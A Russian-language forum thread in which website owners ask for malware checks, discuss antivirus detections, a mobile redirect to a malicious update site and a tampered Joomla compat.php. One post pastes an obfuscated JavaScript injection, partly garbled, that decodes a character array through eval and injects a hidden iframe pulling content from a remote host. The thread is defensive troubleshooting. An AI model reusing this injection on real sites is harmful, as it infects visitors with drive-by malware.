Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

  • Автор темы Автор темы akok
  • Дата начала Дата начала
Да, нет пока все вроде нормально, сюда написал что бы проверили на всякий случай, поскольку проверив комп все оказалось нормально.
 
Привет!
Люди добрые, помогите разобраться. Яндекс кричит про вредоносный код. Все файлы сайта хттп://loadboard.ru проверены и каспером и drweb и avast и sophos и mcafee. Все чисто. Сегодня код найден, завтра нет. Скрипт следующего содержания:
<script>function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#c0','background:url(data:,eval)');var wij=null;var r=document.styleSheets;for(var i=0;i<r.length;i++){try{var bauu=r.cssRules||r.rules;for(var bpio=0;bpio<bauu.length;bpio++){var urnz=bauu.item?bauu.item(bpio):bauu[bpio];if(!urnz.selectorText.match(/#c(\d+)/))continue;wij=urnz.style.backgroundImage.match(/url\("?data\:[^,]*,([^")]+)"?\)/)[1];};}catch(e){};} puny=new Date(2010,11,3,2,21,4);t=puny.getSeconds();var rpzc=[36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,236/t,52/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,392/t,400/t,484/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,136/t,392/t,444/t,400/t,484/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,464/t,456/t,484/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,392/t,400/t,484/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,396/t,388/t,464/t,396/t,416/t,128/t,160/t,404/t,164/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,392/t,444/t,400/t,484/t,128/t,244/t,128/t,392/t,400/t,484/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,36/t,420/t,408/t,128/t,160/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,40t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,128/t,404/t,432/t,460/t,404/t,128/t,492/t,52/t,36/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,476/t,456/t,420/t,464/t,404/t,160/t,136/t,240/t,420/t,408/t,456/4/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,164/t,492/t,52/t,36/t,36/t,36/t,36/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,388/t,436/t,404/t,128/t,460/t,456/t,396/t,244/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,128/t,476/t,420/t,400/t,464/t,416/t,244/t,156/t,196/t,192/t,156/t,128/t,416/t,404/t,420/t,412/t,416/t,464/t,244/t,156/t,196/t,192/t,156/t,128/t,460/t,464/t,484/t,432/t,404/t,244/t,156/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,232/t,416/t,420/t,400/t,400/t,404/t,440/t,236/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,232/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,236/t,432/t,404/t,408/t,464/t,232/t,192/t,236/t,464/t,444/t,448/t,232/t,192/t,236/t,156/t,248/t,240/t,188/t,420/t,408/t,456/t,388/t,436/t,404/t,248/t,136/t,164/t,236/t,52/t,36/t,36/t,36/t,500/t,52/t,36/t,36/t,500/t,52/t,36/t,36/t,408/t,468/t,440/t,396/t,464/t,420/t,444/t,440/t,128/t,420/t,408/t,456/t,388/t,436/t,404/t,456/t,160/t,164/t,492/t,52/t,36/t,36/t,36/t,472/t,388/t,456/t,128/t,408/t,128/t,244/t,128/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,396/t,456/t,404/t,388/t,464/t,404/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,160/t,156/t,420/t,408/t,456/t,388/t,436/t,404/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,460/t,456/t,396/t,156/t,176/t,156/t,416/t,464/t,464/t,448/t,232/t,188/t,188/t,448/t,420/t,396/t,416/t,404/t,464/t,388/t,184/t,440/t,404/t,464/t,188/t,412/t,456/t,404/t,404/t,440/t,184/t,448/t,416/t,448/t,156/t,164/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,472/t,420/t,460/t,420/t,392/t,420/t,432/t,420/t,464/t,484/t,244/t,156/t,416/t,420/t,400/t,400/t,404/t,440/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,448/t,444/t,460/t,420/t,464/t,420/t,444/t,440/t,244/t,156/t,388/t,392/t,460/t,444/t,432/t,468/t,464/t,404/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,432/t,404/t,408/t,464/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,464/t,484/t,432/t,404/t,184/t,464/t,444/t,448/t,244/t,156/t,192/t,156/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,476/t,420/t,400/t,464/t,416/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,408/t,184/t,460/t,404/t,464/t,260/t,464/t,464/t,456/t,420/t,392/t,468/t,464/t,404/t,160/t,156/t,416/t,404/t,420/t,412/t,416/t,464/t,156/t,176/t,156/t,196/t,192/t,156/t,164/t,236/t,52/t,36/t,36/t,36/t,400/t,444/t,396/t,468/t,436/t,404/t,440/t,464/t,184/t,412/t,404/t,464/t,276/t,432/t,404/t,436/t,404/t,440/t,464/t,460/t,264/t,484/t,336/t,388/t,412/t,312/t,388/t,436/t,404/t,160/t,156/t,392/t,444/t,400/t,484/t,156/t,164/t,364/t,192/t,372/t,184/t,388/t,448/t,448/t,404/t,440/t,400/t,268/t,416/t,420/t,432/t,400/t,160/t,408/t,164/t,236/t,52/t,36/t,36/t,500/t];var mw="";ukxy=function(){return{e:eval}}().e;qf=ukxy(wij);var mv='';var phm="fro"+puny.getSeconds()+"arCode";phm=phm.replace(4,"mCh");hx=String[phm];for(var i=0;i<rpzc.length;i++){nqwy=qf(rpzc);hx.call(nqwy);mv+=hx(nqwy);} qf(mv);</script> </body> </html>

Спасибо.
 
Последнее редактирование модератором:
если не ошибаюсь ругается на кусок из кода идущий с рекламой игры.. скопируйте плиз код из файла scripts/ads папка ads
то есть не папка скрипт вашей cms joomla а именно то что пришло с рекламой
 
прошу прощения за безграмотность, как это можно сделать? через FTP или firebug? и если возможно подробнее.. если через firebug, интуиция подсказывает, что копать нужно в этом направлении?[
 
Последнее редактирование модератором:
да, как понимаю айс код туда инклудится банер..и по ходу траблики с ним..
плюс там заметил странную картинку 12 пикселов белый квадрат *** i.png
 
наткнулся на статью про Trojan-Downloader.HTML.Agent.wy, он же Troj/Iframe-IW здесь: хттп://www.mpcontrol.ru/index.php?option=com_content&view=article&id=72%3A-xmega-&catid=1&Itemid=36
По рекомендации открыл и сравнил с оригиналом файл \libraries\joomla\utilities\compat\compat.php
Он явно отличался. Перезаписал оригиналом, жду от яндекса новостей, потом отпишу помогло или нет.
 
да оно.. не забудьте сменить пароль и проверить комп на вируса..
 
Добрый день.

В последнее время хттп://colorandcode.ru начал блокироваться.

При проверке выдает

Avast JS:ScriptIP-inf [Trj]
GData JS:ScriptIP-inf
Ikarus JS.ScriptIP

а остальные показывают что нет вируса, например
ESET-NOD32 вирусов нет
 
Arbitr, через 3 суток сайт выплыл в яндексе без пометок, вот уже неделя все нормально, причина была в compat.php. Пароли сменил с параноидальной длиной, поставил компонент против sql инъекций и всяких других хреней. Поймать бы того кто это сделал да и отрубить голову.
 
dkzfiles, это делал скорее всего скрипт. Ручным взломом занимаются или дети безголовые по инструкции либо под заказ за большие деньги.
 
В разделе вин 7 была выложена ссылка на victоria, хттп://hdd-911.com/index.php?option=content&task=view&id=27&Itemid=27
Когда перехожу с компа по ссылке то все нормально.
Если с планшетника то сразу срабатывает перенаправление,ставлю антивирь выдает как малварьный ресурс.
При перенаправлении идет предложение все скачать,все обновить...
перенаправление на h t t p://bq-update.com/

На планшете вирья вроде нет-сканировал раными утилами,смотрел потроха системы и процессы,ничего подозрительного+проблема только на том сайте.
картинки прилагаю
 

Вложения

  • 17012013181.webp
    17012013181.webp
    13.1 KB · Просмотры: 106
  • .webp
    .webp
    12.9 KB · Просмотры: 108
Последнее редактирование модератором:
Проверь хотя бы хостс, т.к. сылка нормальная, и проблема имхо у тебя на планшетнике.
 
shestale, тут на анроиде нет хостса.
это не шиндос
с другими сайтами все нормально,проблема только с этим.

Добавлено через 35 минут 47 секунд
по описаниям эта штука атакует сайты и внедряет J2ME/TrojanSMS.Agent.DL через мобильные браузеры.
 
Последнее редактирование:
Сайт заражен.

Есть два варианта:
1. Админ зарабатывает на мобильном трафике
2. Сайт взломан и перенаправляет все мобильные устройства на вредоносный сайт. Смотреть .htaccess нужно.
 
щас гляну.
Сайт временно исключать из публикуемых ссылок?

Добавлено через 8 минут 16 секунд
Смотреть .htaccess нужно.

.htaccess перепутал с андройдовскими файлами.
кстати вирье искать несложно-в системе не так уж и много файлов,левые сразу видно.
 
Исключай. Я не нашел контакты админа того сайта....

Добавлено через 22 секунды
Кстати самое важное можно у нас зазеркалить.
 
Приветствую!
Подскажите, пожалуйста, как решить данную проблему:
На поддомене моего сайта обнаружен вирус, который идентифицируется Авастом как JS: cluder [trj]. Яндекс также прислал письмо о наличии вредоносного кода на этом поддомене.

Поддомен:
хттп://tournament.rhl-mod.ru

Заранее благодарю!
 
Назад
Сверху Снизу